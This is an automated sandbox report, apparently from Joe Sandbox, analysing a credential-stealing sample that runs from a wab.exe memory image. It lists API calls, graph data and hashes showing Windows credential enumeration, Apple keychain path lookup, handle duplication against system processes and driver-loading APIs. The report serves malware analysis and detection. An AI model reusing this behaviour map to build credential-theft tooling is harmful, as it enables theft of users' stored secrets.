413f4f -> 40a804 (8 API calls) -> 413f5f GetProcAddress x5 -> 413f37 K32GetModuleFileNameExW; 413cb0 GetModuleHandleW -> 413cbf GetProcAddress -> 413ce3 GetProcessTimes (resolved at run time rather than imported); 409cf9 GetVersionExW; 413d2f, 40440c, 44deb5 FreeLibrary.

Resources
4148b6 FindResourceW -> 4148cf SizeofResource -> 4148e0 LoadResource -> 4148ee LockResource; 41493c EnumResourceNamesW.

String and memory helpers
Conversion: 40a6e6, 40bc61 WideCharToMultiByte; 40a71b, 40a734, 40ab4a, 40ab7c MultiByteToWideChar; 40c47a _wcsupr; 40a714 _wcslwr. Comparison: _wcsicmp (40a995, 40c231, 40cd26, 40dd50), wcscmp (40a99c, 40ade7, 40adfe), memcmp (40b9b5, 40ba5f, 40bcd0, 41c06f), _memicmp (40aae3, 4097f7), 40103c strlen. Building: wcscpy (409d43, 413969, 414bb0, 414cf4), wcscat (409d51, 403c3f, 403c68), wcschr (40c31e, 40c33e, 41396c, 40e3b3), 40b732 wcsrchr, 40abb7 wcslen, memmove, 40e244 _snwprintf. Allocation: 40d00b malloc, ??2@YAPAXI (operator new) and ??3@YAXPAX (operator delete) at 40afcf, 40afe8, 40b04b, 40b1ab, 40b633, 40aa04, 4069a3, 415304, 40b0b5 and 44def7-44df30, 40bb88 LocalFree; memset / memcpy block builders at 447280, 447960, 447920, 42bbd5, 42be4c, 42374a, 42370b, 422aeb, 4227f0, 422b5d, 418a6d, 41a223, 432cc4, 42463b, 41c635, 43bd08, 415a91, 42c02e, 4397fd.

Collapsed subgraphs not expanded in this extract (address: API calls)
445403: 253; 40b6ef: 252; 439811, 44081d, 438c4e, 43a87a, 42db80, 42d836, 42d71d: 164; 42e1c0, 42e199, 4312d0, 42b13b, 42a0a8: 148; 43817e: 140; 42f50e: 139; 4251c4: 137; 438552: 134; 424f26, 42453e: 123; 444432: 121; 424251: 120; 443d90: 111; 41f638: 104; 41e466, 420244: 97; 42413a, 41f3b1: 90; 41fd5e, 41ee6b, 41bf99, 41a453, 41c295, 41f398: 86; 40dd85: 74; 404423: 37; 40c1d3: 35; 40b2cc, 40b273: 27; 406214, 40c084, 439bbb: 22; 43a76c: 21; 403af5, 41851e: 20; 42cc15: 19; every other collapsed node has 17 or fewer API calls. The counts say nothing about which APIs a subgraph contains, so expand them in the full report before drawing conclusions from them.
memset 38166->38168 38167->38123 38168->38166 38170 438246 38169->38170 38172 4381ba 38169->38172 38170->38120 38171 41f432 110 API calls 38171->38172 38172->38170 38172->38171 38239 41f638 104 API calls 38172->38239 38175 41693e 38174->38175 38177 41698e 38174->38177 38178 41694c 38175->38178 38240 422fd1 memset 38175->38240 38177->38118 38178->38177 38241 4165a0 38178->38241 38183 415c81 38182->38183 38185 415c9c 38182->38185 38184 416935 16 API calls 38183->38184 38183->38185 38184->38185 38185->38107 38186->38117 38187->38126 38188->38125 38195 442ffe 38189->38195 38190 443094 38227 4414a9 12 API calls 38190->38227 38192 443092 38192->38144 38195->38190 38195->38192 38213 4414ff 38195->38213 38225 4169a7 11 API calls 38195->38225 38226 441325 memset 38195->38226 38197->38145 38198->38146 38199->38154 38200->38159 38201->38161 38203 4302f9 38202->38203 38208 43025c 38202->38208 38203->38160 38204 4302cd 38228 435ef3 38204->38228 38208->38203 38208->38204 38237 4172c8 memset 38208->38237 38210 4302dc 38238 4386af memset 38210->38238 38212->38166 38214 441539 38213->38214 38216 441547 38213->38216 38215 441575 38214->38215 38214->38216 38217 441582 38214->38217 38219 42fccf 18 API calls 38215->38219 38218 4418e2 38216->38218 38222 442bd4 38216->38222 38220 43275a 12 API calls 38217->38220 38221 4414a9 12 API calls 38218->38221 38223 4418ea 38218->38223 38219->38216 38220->38216 38221->38223 38222->38223 38224 441409 memset 38222->38224 38223->38195 38224->38222 38225->38195 38226->38195 38227->38192 38230 435f03 38228->38230 38232 4302d4 38228->38232 38229 435533 memset 38229->38230 38230->38229 38231 4172c8 memset 38230->38231 38230->38232 38231->38230 38233 4301e7 38232->38233 38234 43023c 38233->38234 38236 4301f5 38233->38236 38234->38210 38235 42b896 memset 38235->38236 38236->38234 38236->38235 38237->38208 38238->38203 38239->38172 38240->38178 38247 415cfe 38241->38247 38246 422b84 15 API calls 38246->38177 38252 415d23 38247->38252 38254 41628e 
38247->38254 38248 4163ca 38249 416422 10 API calls 38248->38249 38249->38254 38250 416422 10 API calls 38250->38252 38251 416172 memset 38251->38252 38252->38248 38252->38250 38252->38251 38253 415cb9 10 API calls 38252->38253 38252->38254 38253->38252 38255 416520 38254->38255 38256 416527 38255->38256 38260 416574 38255->38260 38257 415700 10 API calls 38256->38257 38258 416544 38256->38258 38256->38260 38257->38258 38259 416561 memcpy 38258->38259 38258->38260 38259->38260 38260->38177 38260->38246 38291 41bc3b 38261->38291 38264 41edad 86 API calls 38265 41f1cb 38264->38265 38266 41f1f5 memcmp 38265->38266 38267 41f20e 38265->38267 38271 41f282 38265->38271 38266->38267 38268 41f21b memcmp 38267->38268 38267->38271 38269 41f326 38268->38269 38272 41f23d 38268->38272 38270 41ee6b 86 API calls 38269->38270 38269->38271 38270->38271 38271->38028 38272->38269 38273 41f28e memcmp 38272->38273 38315 41c8df 56 API calls 38272->38315 38273->38269 38274 41f2a9 38273->38274 38274->38269 38277 41f308 38274->38277 38278 41f2d8 38274->38278 38276 41f269 38276->38269 38279 41f287 38276->38279 38280 41f27a 38276->38280 38277->38269 38317 4446ce 11 API calls 38277->38317 38281 41ee6b 86 API calls 38278->38281 38279->38273 38282 41ee6b 86 API calls 38280->38282 38283 41f2e0 38281->38283 38282->38271 38316 41b1ca memset 38283->38316 38286->38028 38287->38028 38288->38028 38289->38022 38290->38023 38292 41bc54 38291->38292 38300 41be0b 38291->38300 38294 41bd61 38292->38294 38292->38300 38304 41bc8d 38292->38304 38318 41baf0 55 API calls 38292->38318 38296 41be45 38294->38296 38327 41a25f memset 38294->38327 38296->38264 38296->38271 38298 41be04 38325 41aee4 56 API calls 38298->38325 38300->38294 38326 41ae17 34 API calls 38300->38326 38301 41bd42 38301->38294 38301->38298 38302 41bdd8 memset 38301->38302 38303 41bdba 38301->38303 38305 41bde7 memcmp 38302->38305 38314 4175ed 6 API calls 38303->38314 38304->38294 38304->38301 38306 41bd18 38304->38306 38319 4151e3 38304->38319 
38305->38298 38308 41bdfd 38305->38308 38306->38294 38306->38301 38323 41a9da 86 API calls 38306->38323 38307 41bdcc 38307->38294 38307->38305 38324 41a1b0 memset 38308->38324 38314->38307 38315->38276 38316->38271 38317->38269 38318->38304 38328 41837f 38319->38328 38322 444706 11 API calls 38322->38306 38323->38301 38324->38298 38325->38300 38326->38294 38327->38296 38329 4183c1 38328->38329 38330 4183ca 38328->38330 38375 418197 25 API calls 38329->38375 38333 4151f9 38330->38333 38349 418160 38330->38349 38333->38306 38333->38322 38334 4183e5 38334->38333 38358 41739b 38334->38358 38337 418444 CreateFileW 38339 418477 38337->38339 38338 41845f CreateFileA 38338->38339 38340 4184c2 memset 38339->38340 38341 41847e GetLastError ??3@YAXPAX 38339->38341 38361 418758 38340->38361 38342 4184b5 38341->38342 38343 418497 38341->38343 38376 444706 11 API calls 38342->38376 38345 41837f 49 API calls 38343->38345 38345->38333 38350 41739b GetVersionExW 38349->38350 38351 418165 38350->38351 38353 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38351->38353 38354 418178 38353->38354 38355 41817f 38354->38355 38356 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38354->38356 38355->38334 38357 418188 ??3@YAXPAX 38356->38357 38357->38334 38359 4173d6 38358->38359 38360 4173ad GetVersionExW 38358->38360 38359->38337 38359->38338 38360->38359 38362 418680 43 API calls 38361->38362 38363 418782 38362->38363 38364 418506 ??3@YAXPAX 38363->38364 38365 418160 11 API calls 38363->38365 38364->38333 38366 418799 38365->38366 38366->38364 38367 41739b GetVersionExW 38366->38367 38368 4187a7 38367->38368 38369 4187da 38368->38369 38370 4187ad GetDiskFreeSpaceW 38368->38370 38372 4187ec GetDiskFreeSpaceA 38369->38372 38374 4187e8 38369->38374 38373 418800 ??3@YAXPAX 38370->38373 38372->38373 38373->38364 38374->38372 38375->38330 38376->38333 38425 424f07 38377->38425 38379 4251e4 38380 4251f7 38379->38380 38381 4251e8 38379->38381 
38433 4250f8 38380->38433 38432 4446ea 11 API calls 38381->38432 38383 4251f2 38383->38042 38385 425209 38388 425249 38385->38388 38391 4250f8 127 API calls 38385->38391 38392 425287 38385->38392 38441 4384e9 135 API calls 38385->38441 38442 424f74 124 API calls 38385->38442 38386 415c7d 16 API calls 38386->38383 38388->38392 38443 424ff0 38388->38443 38391->38385 38392->38386 38393 425266 38393->38392 38446 415be9 memcpy 38393->38446 38395->38042 38396->38069 38397->38042 38399 42533e 16 API calls 38398->38399 38400 42541f 38399->38400 38401 424ff0 13 API calls 38400->38401 38402 425425 38401->38402 38403 42538f 16 API calls 38402->38403 38404 42542d 38403->38404 38404->38042 38406 425345 38405->38406 38407 425357 38405->38407 38406->38407 38408 416935 16 API calls 38406->38408 38407->38042 38408->38407 38410 425394 38409->38410 38411 42539e 38409->38411 38412 415c7d 16 API calls 38410->38412 38411->38042 38412->38411 38413->38042 38414->38060 38415->38044 38417 4442eb 38416->38417 38420 444303 38416->38420 38418 41707a 11 API calls 38417->38418 38419 4442f2 38418->38419 38419->38420 38514 4446ea 11 API calls 38419->38514 38420->38050 38422 444300 38422->38050 38423->38058 38424->38068 38426 424f1f 38425->38426 38427 424f0c 38425->38427 38448 424eea 11 API calls 38426->38448 38447 416760 11 API calls 38427->38447 38430 424f18 38430->38379 38431 424f24 38431->38379 38432->38383 38434 425108 38433->38434 38440 42510d 38433->38440 38481 424f74 124 API calls 38434->38481 38437 42516e 38439 415c7d 16 API calls 38437->38439 38438 425115 38438->38385 38439->38438 38440->38438 38449 42569b 38440->38449 38441->38385 38442->38385 38499 422f5c 38443->38499 38446->38392 38447->38430 38448->38431 38450 4256f1 38449->38450 38477 4259c2 38449->38477 38456 4259da 38450->38456 38460 422aeb memset memcpy memcpy 38450->38460 38461 429a4d 38450->38461 38465 4260a1 38450->38465 38475 429ac1 38450->38475 38450->38477 38480 425a38 38450->38480 38482 4227f0 memset memcpy 38450->38482 
38483 422b84 15 API calls 38450->38483 38484 422b5d memset memcpy memcpy 38450->38484 38485 422640 13 API calls 38450->38485 38487 4241fc 11 API calls 38450->38487 38488 42413a 90 API calls 38450->38488 38455 4260dd 38493 424251 120 API calls 38455->38493 38492 416760 11 API calls 38456->38492 38460->38450 38462 429a66 38461->38462 38463 429a9b 38461->38463 38494 415c56 11 API calls 38462->38494 38467 429a96 38463->38467 38496 416760 11 API calls 38463->38496 38491 415c56 11 API calls 38465->38491 38497 424251 120 API calls 38467->38497 38470 429a7a 38495 416760 11 API calls 38470->38495 38476 425ad6 38475->38476 38498 415c56 11 API calls 38475->38498 38476->38437 38477->38476 38486 415c56 11 API calls 38477->38486 38480->38477 38489 422640 13 API calls 38480->38489 38490 4226e0 12 API calls 38480->38490 38481->38440 38482->38450 38483->38450 38484->38450 38485->38450 38486->38456 38487->38450 38488->38450 38489->38480 38490->38480 38491->38456 38492->38455 38493->38476 38494->38470 38495->38467 38496->38467 38497->38475 38498->38456 38500 422f66 38499->38500 38507 422fb6 38499->38507 38501 422f8b 38500->38501 38500->38507 38510 422693 13 API calls 38500->38510 38503 422f95 38501->38503 38504 422fb8 38501->38504 38509 422fab 38503->38509 38511 422640 13 API calls 38503->38511 38513 422726 12 API calls 38504->38513 38507->38393 38509->38507 38512 4226e0 12 API calls 38509->38512 38510->38501 38511->38509 38512->38507 38513->38507 38514->38422 38515->38074 38518 432fc6 38516->38518 38519 432fdd 38518->38519 38522 43bd08 memset 38518->38522 38520 43024d memset 38519->38520 38521 43300e 38519->38521 38520->38519 38521->38002 38522->38518 40424 4147f3 40427 414561 40424->40427 40426 414813 40428 41456d 40427->40428 40429 41457f GetPrivateProfileIntW 40427->40429 40432 4143f1 memset _itow WritePrivateProfileStringW 40428->40432 40429->40426 40431 41457a 40431->40426 40432->40431

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of the function at 0040DD85, rendered as text by the report's graph widget: basic blocks in the range 40dd85-40e01b with their edges; graph data not reproduced. API calls shown in the graph: memset, CreateFileW, NtQuerySystemInformation, FindCloseChangeNotification, GetCurrentProcessId, _wcsicmp, OpenProcess, GetCurrentProcess, DuplicateHandle, CloseHandle.]
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 594330280-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of the function at 00413D4C, rendered as text by the report's graph widget: basic blocks in the range 413d4c-413f24 with their edges; graph data not reproduced. API calls shown in the graph: CreateToolhelp32Snapshot, memset, Process32FirstW, Process32NextW, OpenProcess, CloseHandle, GetModuleHandleW, GetProcAddress, ??3@YAXPAX@Z.]
APIs
  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 912665193-1740548384
• Opcode ID: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
• Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                      • String ID: BIN
                                                                                                                                                                                                                      • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                                                                        • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2420179184-0
                                                                                                                                                                                                                      • Opcode ID: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                                      • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                                                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph for the function starting at 44553b: the rendered graph's raw node and edge data is not reproduced here.]
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                      • API String ID: 2745753283-3798722523
                                                                                                                                                                                                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

